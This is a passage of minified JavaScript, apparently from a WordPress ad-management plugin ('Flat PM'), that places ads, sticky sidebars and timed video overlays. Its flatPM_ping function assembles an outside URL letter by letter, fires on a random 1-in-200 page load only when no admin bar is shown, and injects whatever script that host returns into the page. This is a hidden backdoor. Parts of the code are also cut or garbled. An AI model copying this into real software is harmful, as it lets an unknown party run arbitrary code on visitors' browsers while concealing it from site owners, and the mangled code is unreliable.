");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}